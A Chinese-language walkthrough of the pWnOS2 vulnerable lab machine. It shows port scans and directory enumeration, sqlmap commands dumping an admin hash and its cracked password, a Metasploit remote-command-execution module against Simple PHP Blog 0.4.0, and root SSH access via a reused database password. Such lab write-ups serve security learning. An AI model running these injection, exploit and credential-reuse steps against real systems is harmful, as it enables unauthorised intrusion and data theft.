pWnOS2
这个靶机默认静态ip为10.10.10.100,所以不能使用VM NAT模式,将kali和靶机网络同时设置为仅主机模式,并在虚拟网络编辑器中设置仅主机模式网段为10.10.10.0。重新启动虚拟机,就可以发现可以扫描到靶机了。
kaliIP:10.10.10.128
靶机IP:10.10.10.100
然后老规矩,先进行信息收集工作。
先用最小速率,看大概情况
sudo nmap --min-rate 10000 -p- 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-01 10:00 CST
Nmap scan report for 10.10.10.100
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
接下来对端口进行TCP和UDP扫描
sudo nmap -sT -sV -O -p22,80 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-01 10:01 CST
Nmap scan report for 10.10.10.100
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:C3:40:F1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.75 seconds
sudo nmap -sU -p22,80 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-01 10:03 CST
Nmap scan report for 10.10.10.100
Host is up (0.00028s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:C3:40:F1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds
看来靶机突破口大概率在web页面了。访问一下
扫描目录
sudo dirb http://10.10.10.100
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 1 10:16:41 2023
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)
---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6011)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8093)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5760)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5044)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5402)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Sep 1 10:16:49 2023
DOWNLOADED: 9224 - FOUND: 30
看一下有没有cms
sudo whatweb -v 10.10.10.100
WhatWeb report for http://10.10.10.100
Status : 200 OK
Title : Welcome to this Site!
IP : 10.10.10.100
Country : RESERVED, ZZ
Summary : Apache[2.2.17], Cookies[PHPSESSID], Email[admin@isints.com], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], PHP[5.3.5-1ubuntu7], X-Powered-By[PHP/5.3.5-1ubuntu7]
web页面是一个博客,在html网页中发现隐藏信息:
<meta name="generator" content="Simple PHP Blog 0.4.0">
web页面存在爆破和注入,测试挂在后台,然后再搜索一下这个博客系统的详细信息。
sqlmap跑出了账号和密码,建议以后还是把post数据包放到sqlmap目录下,打文件地址好烦。。
sqlmap -r "/home/**/桌面/1.txt" -p n --dbs
sqlmap -r "/home/**/桌面/1.txt" -D ch16 --tables
sqlmap -r "/home/**/桌面/1.txt" -D ch16 -T users --dump
Database: ch16
Table: users
[1 entry]
+---------+------------------------------------------+------------------+----------+-----------+------------+------------+---------------------+
| user_id | pass | email | active | last_name | first_name | user_level | registration_date |
+---------+------------------------------------------+------------------+----------+-----------+------------+------------+---------------------+
| 1 | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | admin@isints.com | NULL | Privett | Dan | 0 | 2011-05-07 17:27:01 |
+---------+------------------------------------------+------------------+----------+-----------+------------+------------+---------------------+
在线爆破md5的到pass:killerbeesareflying,登录无信息。
查到msf有这个版本博客的漏洞,尝试利用
searchsploit Simple PHP Blog 0.4.0
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
设置好rhost和lhost之后run,拿到bash
python -c "import pty;pty.spawn('/bin/bash')"
切换成交互式命令行
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
切换到不同的目录查看可能存在的配置文件
重点在/var 目录和/www 目录
分别连接,发现/var/mysqli_connect.php文件中账号密码正确,提权成功
ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)
* Documentation: http://www.ubuntu.com/server/doc
System information as of Fri Jul 7 10:06:52 EDT 2023
System load: 0.0 Processes: 86
Usage of /: 2.9% of 38.64GB Users logged in: 0
Memory usage: 23% IP address for eth0: 10.10.10.100
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~# whoami
root
